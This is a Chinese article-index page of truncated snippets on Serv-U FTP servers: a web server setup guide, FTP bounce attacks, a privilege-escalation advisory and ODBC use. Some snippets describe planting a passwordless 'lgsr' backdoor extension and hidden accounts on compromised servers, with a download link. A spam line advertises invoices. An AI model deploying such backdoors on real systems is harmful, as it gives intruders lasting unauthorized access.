我是上海电信ADSL宽带用户使用中兴ADSL 831 MODEN 上网
本人年岁已大在技术上不求甚解就依样画葫芦经过 2周努力初步组建了个人网站WebSite供大家参考具体如下:
、安装Win2000服务器版把自己需要装软件Software都装好有关网络设置放在最后再进行比较好
2、申请花生壳域名和安装花生壳软件Software
3、设置WEB服务器
我们知道安装好WIN2000系统后系统重启会自动出现“Windows2000 配置您服务器”向导对话框我们可以选择“以后配置这个服务器”把他关闭然后设置自己WEB服务器
首先在D盘或其他分区建立个如myhost的类文件夹用于放置自己网站Web [阅读全文] [PDF]
FTP反弹攻击(FTP Bounce Attack)是很古老技术了居然能在我们信息安全教材上找得到介绍可见其确实年代久远
所谓FTP反弹攻击就是利用FTP协议PORT命令将数据发送到第 3方这样就可以利用FTP服务器实现对其他机器端口扫描和发送数据了由于这种攻击存在所以FTP服务器般都限制了PORT命令ip地址为客户端ip且端口大于1024
现在比较流行FTP软件SoftwareServ-U默认情况下(似乎?)却没有限制FTP Bounce攻击造成安全隐患
以下是对有限制Serv-U进行反弹攻击:
220-欢迎光临lake2blog
[阅读全文] [PDF]
本地提升权限:是
远程提升权限:是
使用前提条件:对Serv-U配置文件有修改权限
声明:这只是个提升权限思路和思路方法
、受影响软件Software
Serv-U FTP Server 4.1.0.9 (以及以前所有版本)
2、受影响系统
Microsoft Windows Server 2003 所有版本
Microsoft Windows XP 所有版本
Microsoft Windows 2000 所有版本
Microsoft Windows NT 所有版本
3、综述
[阅读全文] [PDF]
Serv-U ODBC Database 使用
Serv-U 5.0以上支持ODBC数据库能够使用数据库管理帐号、权限适用于需要提供 FTP 下载 BBS 论坛、音乐网站WebSite、软件Software网站WebSite、电影网站WebSite、企业网络等等特别在多台FTP服务器集群环境下所有FTP服务器共享套帐号数据库维护管理
使用数据库例子可以在这本站或这下载到 http://www.serv-u.com/addons.asp
首先在新建域时候第 4步选择如下:
将下载数据库建立ODBC数据
的后在Serv-U中就可以使用ODBC数据源了
在Serv [阅读全文] [PDF]
现在大多数WINDOWS服务器都使用SERV-U做FTP服务器直到serv-u5.2版为止仍然存在本地权限提升漏洞在获得了最高控制权限的后需要留下个隐蔽后门以备我们下次光临查看serv-u帮助文件可知serv-u提供了个扩展接口通过这个接口可以管理用户访问权限所以我们就很容易就根据这个接口留下个后门
下面是我写个扩展实现功能是如果是帐号lgsr来登陆就不需要密码同时把服务器C:\盘映射到该帐号主目录同时赋予lgsr帐号远程管理权限
下载地址为:
http://www.yueyong.net/down/ServuBack.rar
安装思路方法:
ServuBack.rar解压把servu.dll [阅读全文] [PDF]
当你肉机安装了SERV-U 时你可用下面思路方法建立隐藏账号
首先确认SERV-U安装好了并能正确运行
这里有个SERV-U扩展库必须安装在SERV-U3.0版本以上!
这个包共包含4个文件
webseru.dll
myservu.mdb
webservu.ini
readme.txt
其中myservu.mdb用于存放帐号和密码(没有加密)
webservu.ini保存了些配置信息
/////////////////////////////////////////
//以下是webservu.ini内容
///////// [阅读全文] [PDF]
作者: 6根山人 来自;http://www.yueyong.net
现在大多数WINDOWS服务器都使用SERV-U做FTP服务器直到serv-u5.2版为止仍然存在本地权限提升漏洞在获得了最高控制权限的后需要留下个隐蔽后门以备我们下次光临查看serv-u帮助文件可知serv-u提供了个扩展接口通过这个接口可以管理用户访问权限所以我们就很容易就根据这个接口留下个后门
下面是我写个扩展实现功能是如果是帐号lgsr来登陆就不需要密码同时把服务器C:\盘映射到该帐号主目录同时赋予lgsr帐号远程管理权限
下载地址为:
http://www.yueyong.net/down/S [阅读全文] [PDF]
首先确认SERV-U安装好了并能正确运行
这里有个SERV-U扩展库必须安装在SERV-U3.0版本以上!
这个包共包含4个文件
webseru.dll
myservu.mdb
webservu.ini
readme.txt
其中myservu.mdb用于存放帐号和密码(没有加密)
webservu.ini保存了些配置信息
/////////////////////////////////////////
//以下是webservu.ini内容
////////////////////////////////////////
[]
hom [阅读全文] [PDF]
1 共8条 分1页
- +_@开青岛发票13434444051程生
- 一个简单的 2层系统分析全程
- 主题和皮肤系列(3)
- 主题和皮肤系列(1)
- 主题和皮肤系列(2)
- 鼠标移上去显示层:鼠标滑过显示隐藏层(转)
- jspajax自动刷新:jsp+ajax自动刷新例子(转)
- form表单验证:用js将form表单同时提交到两个区别页面的思路方法
- php上传代码:php统计代码总行数
- 最佳网页宽度及其实现
- 联想2155:PKU 2155
- micboost什么意思:Boost 概述
- atmega16ucosii:μC/OS-II实时性能测试和分析
- cssimportant:4 种实时操作系统实时性的分析对比 --转 time too important
- 基于OHCI的USB主机 —— 总体构架
- 虚拟主机usb:基于OHCI的USB主机 —— 背景介绍
- vc用法:VC使用方法汇总
- 张孝祥《Java就业培训教程》源代码 02 部分
- 抽象类和接口:详细解析Java中抽象类和接口的区别
- 跟踪技术:JSP中的会话跟踪技术